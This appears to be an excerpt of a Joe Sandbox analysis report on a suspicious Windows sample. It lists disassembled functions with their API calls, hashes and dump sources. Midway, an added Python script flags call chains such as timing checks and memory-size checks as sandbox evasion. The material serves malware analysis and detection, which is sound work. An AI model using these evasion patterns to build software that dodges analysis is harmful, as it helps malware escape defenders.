                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                        • String ID:
                                        • API String ID: 2880819207-0
                                        • Opcode ID: 969c463a16606a600fc3e6c07d27a03d05e93b8019d8da21a22973704ce53274
                                        • Instruction ID: 031a07037ffa94409ee1c0ec16c8c9a24ea3d147c12f122a043e963c541b8be4
                                        • Opcode Fuzzy Hash: 969c463a16606a600fc3e6c07d27a03d05e93b8019d8da21a22973704ce53274
                                        • Instruction Fuzzy Hash: 9D11DB76904354BBC701AFA8DC05AAF7FADAB45320F14435AF914D7791D6B0DD848BB0
                                        APIs
                                        • CreateThread.KERNEL32(00000000,?,0009CFF9,00000000,00000004,00000000), ref: 0009D218
                                        • GetLastError.KERNEL32 ref: 0009D224
                                        • __dosmaperr.LIBCMT ref: 0009D22B
                                        • ResumeThread.KERNEL32(00000000), ref: 0009D249
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Thread$CreateErrorLastResume__dosmaperr
                                        • String ID:
                                        • API String ID: 173952441-0
                                        • Opcode ID: 3ed5efc18c86ade25ee64d058d3f79cf5995937a8de2498c896bd1c6a357642a
                                        • Instruction ID: d8413bf63b0499154a59311abe4e17e0e08904e3d26364ee24ac25084f8d653d
                                        • Opcode Fuzzy Hash: 3ed5efc18c86ade25ee64d058d3f79cf5995937a8de2498c896bd1c6a357642a
                                        • Instruction Fuzzy Hash: DE01F936845104BBDF215BA5DC05BEE7B69EF91730F10431AF925961D1CB70C941E6A0
                                        APIs
                                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0007604C
                                        • GetStockObject.GDI32(00000011), ref: 00076060
                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 0007606A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: CreateMessageObjectSendStockWindow
                                        • String ID:
                                        • API String ID: 3970641297-0
                                        • Opcode ID: b2959cd10a60b77b8a92ff45eee417b34a85b801319f5a12c4fca13a4cddcd9a
                                        • Instruction ID: fc6ee0f9d3e804b4f8b31908ae90fcc86a70f427119fbab98c17850a784f7b86
                                        • Opcode Fuzzy Hash: b2959cd10a60b77b8a92ff45eee417b34a85b801319f5a12c4fca13a4cddcd9a
                                        • Instruction Fuzzy Hash: 9B118E72501908BFEF224F94CC44AEB7BA9FF08364F004201FA0952110C776ACA09FD0
                                        APIs
                                        • ___BuildCatchObject.LIBVCRUNTIME ref: 00093B56
                                          • Part of subcall function 00093AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00093AD2
                                          • Part of subcall function 00093AA3: ___AdjustPointer.LIBCMT ref: 00093AED
                                        • _UnwindNestedFrames.LIBCMT ref: 00093B6B
                                        • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00093B7C
                                        • CallCatchBlock.LIBVCRUNTIME ref: 00093BA4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                        • String ID:
                                        • API String ID: 737400349-0
                                        • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                        • Instruction ID: cab8064657d2b93dc2ab0dcd5db967b275b57fe34b9d36f97672417fb0d08ef3
                                        • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                        • Instruction Fuzzy Hash: 4801E932100149BBDF126E95CC46EEB7BAAEF98754F044014FE4896122C736E962EFA0
                                        APIs
                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,000713C6,00000000,00000000,?,000A301A,000713C6,00000000,00000000,00000000,?,000A328B,00000006,FlsSetValue), ref: 000A30A5
                                        • GetLastError.KERNEL32(?,000A301A,000713C6,00000000,00000000,00000000,?,000A328B,00000006,FlsSetValue,00112290,FlsSetValue,00000000,00000364,?,000A2E46), ref: 000A30B1
                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,000A301A,000713C6,00000000,00000000,00000000,?,000A328B,00000006,FlsSetValue,00112290,FlsSetValue,00000000), ref: 000A30BF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: LibraryLoad$ErrorLast
                                        • String ID:
                                        • API String ID: 3177248105-0
                                        • Opcode ID: 785f67323df9520fde694bf7de3516935f086ad01b70f63f3bedb11787f0b123
                                        • Instruction ID: 9ca390563d53f7d45be574452d6fe89f2db4b5e567fb22bdcaeba003b21e07c6
                                        • Opcode Fuzzy Hash: 785f67323df9520fde694bf7de3516935f086ad01b70f63f3bedb11787f0b123
                                        • Instruction Fuzzy Hash: AA012B32301222ABCB314BF99C54E577BD8AF07BA1B204720F945E7580C731D941CAE0
                                        APIs
                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 000D747F
                                        • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 000D7497
                                        • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 000D74AC
                                        • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 000D74CA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Type$Register$FileLoadModuleNameUser
                                        • String ID:
                                        • API String ID: 1352324309-0
                                        • Opcode ID: 483b05ccb948630aa7551f863f6afa8d63ce5c977ae284a84b06ae1f7a77e0df
                                        • Instruction ID: 0d24f35504b1517b9815fe90c2e686e48275ef00691da24647d6305052150752
                                        • Opcode Fuzzy Hash: 483b05ccb948630aa7551f863f6afa8d63ce5c977ae284a84b06ae1f7a77e0df
                                        • Instruction Fuzzy Hash: CA118BB1205310ABE7318F14DC08B96BBFCFF00B00F10856AA65AD6691E7B0E944DFA0
                                        APIs
                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,000DACD3,?,00008000), ref: 000DB0C4
                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,000DACD3,?,00008000), ref: 000DB0E9
                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,000DACD3,?,00008000), ref: 000DB0F3
                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,000DACD3,?,00008000), ref: 000DB126
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: CounterPerformanceQuerySleep
                                        • String ID:
                                        • API String ID: 2875609808-0
                                        • Opcode ID: 299b0719552c65a923a31512603193adf4b62886c98d3fcf1e11855dc3f30989
                                        • Instruction ID: 865b7a0088e05a7024ce730df6ce0ddedcab9a0f8aaa8c85b8c9f9a4688222ae
                                        • Opcode Fuzzy Hash: 299b0719552c65a923a31512603193adf4b62886c98d3fcf1e11855dc3f30989
                                        • Instruction Fuzzy Hash: 30116D31C0162CEBCF10AFE4E9596EEBF78FF09711F524186D981B2281CB7096908BA5
                                        APIs
                                        • GetWindowRect.USER32(?,?), ref: 00107E33
                                        • ScreenToClient.USER32(?,?), ref: 00107E4B
                                        • ScreenToClient.USER32(?,?), ref: 00107E6F
                                        • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00107E8A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ClientRectScreen$InvalidateWindow
                                        • String ID:
                                        • API String ID: 357397906-0
                                        • Opcode ID: fd3f68d7f707012c96d74301dc084daeecdad777decc1262a36e459bc0051bca
                                        • Instruction ID: c5a70ee51378f62cfda4aa6ebc55743f56166749d03eb4f874cb2b8ae66de339
                                        • Opcode Fuzzy Hash: fd3f68d7f707012c96d74301dc084daeecdad777decc1262a36e459bc0051bca
                                        • Instruction Fuzzy Hash: 111186B9D0024AAFDB41CF98C8849EEBBF5FF08310F104156E951E3650D775AA94CF90
                                        APIs
                                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 000D2DC5
                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 000D2DD6
                                        • GetCurrentThreadId.KERNEL32 ref: 000D2DDD
                                        • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 000D2DE4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                        • String ID:
                                        • API String ID: 2710830443-0
                                        • Opcode ID: 7b3d6115eecd0be9ee35f2a4501279720df127be14f6b86b8d3511ca073a4aaa
                                        • Instruction ID: 647f48eecc0efe8619d61d1ee62953f1c59d91dd741d06c9e30d985e0b599c85
                                        • Opcode Fuzzy Hash: 7b3d6115eecd0be9ee35f2a4501279720df127be14f6b86b8d3511ca073a4aaa
                                        • Instruction Fuzzy Hash: 94E06D71101324BAD7301B629C0DEEB3E6DFB56BA1F000216B145D16809AE18880CAF0
                                        APIs
                                          • Part of subcall function 00089639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00089693
                                          • Part of subcall function 00089639: SelectObject.GDI32(?,00000000), ref: 000896A2
                                          • Part of subcall function 00089639: BeginPath.GDI32(?), ref: 000896B9
                                          • Part of subcall function 00089639: SelectObject.GDI32(?,00000000), ref: 000896E2
                                        • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00108887
                                        • LineTo.GDI32(?,?,?), ref: 00108894
                                        • EndPath.GDI32(?), ref: 001088A4
                                        • StrokePath.GDI32(?), ref: 001088B2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                        • String ID:
                                        • API String ID: 1539411459-0
                                        • Opcode ID: ce783551162ae16eeafd437b42c8052939e2273589450400a0770185aa8e6219
                                        • Instruction ID: cc718119825c108bd571e26503f6b05d3172f4a78a06bcfb54da2cb7dab6b6d6
                                        • Opcode Fuzzy Hash: ce783551162ae16eeafd437b42c8052939e2273589450400a0770185aa8e6219
                                        • Instruction Fuzzy Hash: 82F05E3A045258FAEB126F94AC0DFCE3F59AF06310F048101FA91654E2C7B555A1DFE5
                                        APIs
                                        • GetSysColor.USER32(00000008), ref: 000898CC
                                        • SetTextColor.GDI32(?,?), ref: 000898D6
                                        • SetBkMode.GDI32(?,00000001), ref: 000898E9
                                        • GetStockObject.GDI32(00000005), ref: 000898F1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Color$ModeObjectStockText
                                        • String ID:
                                        • API String ID: 4037423528-0
                                        • Opcode ID: f879c85cddf42c33ded04a57e70e227d6a2c1de57b0eb6ab60811894f207796c
                                        • Instruction ID: c85ef3ff8a060d043d48ac906b21157e252414b70e5bf98b9f8edabea45800f9
                                        • Opcode Fuzzy Hash: f879c85cddf42c33ded04a57e70e227d6a2c1de57b0eb6ab60811894f207796c
                                        • Instruction Fuzzy Hash: 3AE06D31244680EEDB215B78AC09BEC3F61AB52336F04C319FAFA584E1C3B146909F50
                                        APIs
                                        • GetCurrentThread.KERNEL32 ref: 000D1634
                                        • OpenThreadToken.ADVAPI32(00000000,?,?,?,000D11D9), ref: 000D163B
                                        • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,000D11D9), ref: 000D1648
                                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,000D11D9), ref: 000D164F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: CurrentOpenProcessThreadToken
                                        • String ID:
                                        • API String ID: 3974789173-0
                                        • Opcode ID: 657427db73ac90c017caac371fd5865479edba529f2b6983aa10c90021ec25d2
                                        • Instruction ID: 6d0430688d75f95a894f4c61fa899d1d2b13a0f7b9e80f1cf8e19a50040ceed5
                                        • Opcode Fuzzy Hash: 657427db73ac90c017caac371fd5865479edba529f2b6983aa10c90021ec25d2
                                        • Instruction Fuzzy Hash: B8E08635601311EBE7601FA09D0DB873BBDAF54791F14C909F285C9480DAB48480CFA0
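The API chains in these records are what the report's behaviour signatures key on: the QueryPerformanceCounter/Sleep pair above is the "execution timing" check, this record's OpenThreadToken/OpenProcessToken pair is token access, and the Sleep/GlobalMemoryStatusEx record further down is the physical-memory sandbox check. As an added example (not Joe Sandbox's code), the Python below parses the lines under a record's "APIs" heading into structured calls and tests them against a few ordered-chain rules. The sample records are copied from this section; the rule chains and their labels are my own assumptions that approximate the report's signatures, not Joe Sandbox's matching logic.

```python
"""Parse Joe Sandbox "APIs" records into structured calls and flag known chains.

Added example, not Joe Sandbox code.  SAMPLE_RECORDS are copied from this
report's function listing; RULES (chains and labels) are assumptions that
approximate the report's behaviour signatures, not Joe Sandbox's own logic.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Optional

# One "APIs" line.  Forms seen on the page:
#   • GetDC.USER32(00000000), ref: 000CD862
#   • GetCurrentThread.KERNEL32 ref: 000D1634
#   • Part of subcall function 00093AA3: ___AdjustPointer.LIBCMT ref: 00093AED
# The argument columns are the stack slots Joe recovered; "?" means unknown.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_][\w:]*)\.(?P<module>[A-Za-z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass(frozen=True)
class ApiCall:
    name: str
    module: str
    args: tuple[str, ...]
    ref: int                   # address of the call site
    subcall_of: Optional[int]  # callee address when the call happens inside a subroutine


def parse_apis(record: str) -> list[ApiCall]:
    """Parse the lines under one function's "APIs" heading, preserving order."""
    calls: list[ApiCall] = []
    for line in record.splitlines():
        if not line.strip():
            continue
        m = API_LINE.match(line)
        if m is None:
            raise ValueError(f"unrecognised API line: {line!r}")
        args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] else ()
        sub = int(m["sub"], 16) if m["sub"] else None
        calls.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16), sub))
    return calls


# Ordered chains (in-order subsequence, not necessarily adjacent).  Assumed labels.
RULES: dict[str, tuple[str, ...]] = {
    "execution timing (debugger/sandbox detection)":
        ("QueryPerformanceCounter", "Sleep", "QueryPerformanceCounter"),
    "process/thread token access":
        ("OpenThreadToken", "OpenProcessToken"),
    "physical memory size check (sandbox detection)":
        ("Sleep", "GlobalMemoryStatusEx"),
    "attach to foreign thread input":
        ("GetWindowThreadProcessId", "AttachThreadInput"),
}


def contains_chain(calls: list[ApiCall], chain: tuple[str, ...],
                   include_subcalls: bool = False) -> bool:
    """True if `chain` occurs as an in-order subsequence of the call names."""
    names = iter(c.name for c in calls if include_subcalls or c.subcall_of is None)
    # `any` consumes the shared iterator up to the first match, so order is enforced.
    return all(any(n == wanted for n in names) for wanted in chain)


def classify(record: str) -> list[str]:
    """Labels of every rule whose chain the record's direct calls contain."""
    calls = parse_apis(record)
    return [label for label, chain in RULES.items() if contains_chain(calls, chain)]


# Constructed input: API lines copied from four records in this report section.
SAMPLE_RECORDS: dict[str, str] = {
    "000DB0C4": """\
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,000DACD3,?,00008000), ref: 000DB0C4
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,000DACD3,?,00008000), ref: 000DB0E9
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,000DACD3,?,00008000), ref: 000DB0F3
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,000DACD3,?,00008000), ref: 000DB126
""",
    "000D1634": """\
• GetCurrentThread.KERNEL32 ref: 000D1634
• OpenThreadToken.ADVAPI32(00000000,?,?,?,000D11D9), ref: 000D163B
• GetCurrentProcess.KERNEL32(00000028,?,?,?,?,000D11D9), ref: 000D1648
• OpenProcessToken.ADVAPI32(00000000,?,?,?,000D11D9), ref: 000D164F
""",
    "0008F2A2": """\
• Sleep.KERNEL32(00000000), ref: 0008F2A2
• GlobalMemoryStatusEx.KERNEL32(?), ref: 0008F2BB
""",
    "00093B56": """\
• ___BuildCatchObject.LIBVCRUNTIME ref: 00093B56
  • Part of subcall function 00093AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00093AD2
• _UnwindNestedFrames.LIBCMT ref: 00093B6B
""",
}

if __name__ == "__main__":
    for func, record in SAMPLE_RECORDS.items():
        hits = classify(record) or ["no rule matched"]
        print(f"sub_{func}: {', '.join(hits)}")
```

Subcall lines ("Part of subcall function ...") are kept in the parse but excluded from matching by default, since they describe a callee rather than the function itself; pass `include_subcalls=True` to widen a rule. The CRT exception-handling record parses cleanly and matches nothing, which is the expected negative case.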
                                        APIs
                                        • GetDesktopWindow.USER32 ref: 000CD858
                                        • GetDC.USER32(00000000), ref: 000CD862
                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 000CD882
                                        • ReleaseDC.USER32(?), ref: 000CD8A3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: CapsDesktopDeviceReleaseWindow
                                        • String ID:
                                        • API String ID: 2889604237-0
                                        • Opcode ID: 9e4280625f843b7b27c7e6da0aa0273116fbd76c47832add5e50c2229b76383c
                                        • Instruction ID: 12f5f4e431d0aed195358c950eba9971d978a7526d9c846897a0175433c822cd
                                        • Opcode Fuzzy Hash: 9e4280625f843b7b27c7e6da0aa0273116fbd76c47832add5e50c2229b76383c
                                        • Instruction Fuzzy Hash: 6BE01AB4800204DFCF61AFA0D808A6DBBB1FB08310F20C119F88AE7750CB798981AF90
                                        APIs
                                        • GetDesktopWindow.USER32 ref: 000CD86C
                                        • GetDC.USER32(00000000), ref: 000CD876
                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 000CD882
                                        • ReleaseDC.USER32(?), ref: 000CD8A3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: CapsDesktopDeviceReleaseWindow
                                        • String ID:
                                        • API String ID: 2889604237-0
                                        • Opcode ID: 18796b987172fbfe658e0a7804a796739bcc94d699e653faba5d8fc7989fed28
                                        • Instruction ID: fd54f01ca811955978b48a73af66c15860c2b5fa776592b36a298efdeaedbad0
                                        • Opcode Fuzzy Hash: 18796b987172fbfe658e0a7804a796739bcc94d699e653faba5d8fc7989fed28
                                        • Instruction Fuzzy Hash: 5BE09A75C00204DFCF61AFA0D80866DBBB5BB08311F14C559F98AE7750CB7959419F90
                                        APIs
                                          • Part of subcall function 00077620: _wcslen.LIBCMT ref: 00077625
                                        • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 000E4ED4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Connection_wcslen
                                        • String ID: *$LPT
                                        • API String ID: 1725874428-3443410124
                                        • Opcode ID: 060f427c3cbec99be2535618e46ede1a7391c513f3d70c489905815c26d86e08
                                        • Instruction ID: 40a9c7eac646847083e5c0db9e434afb0ca8ba5831069355196e096c58dd5912
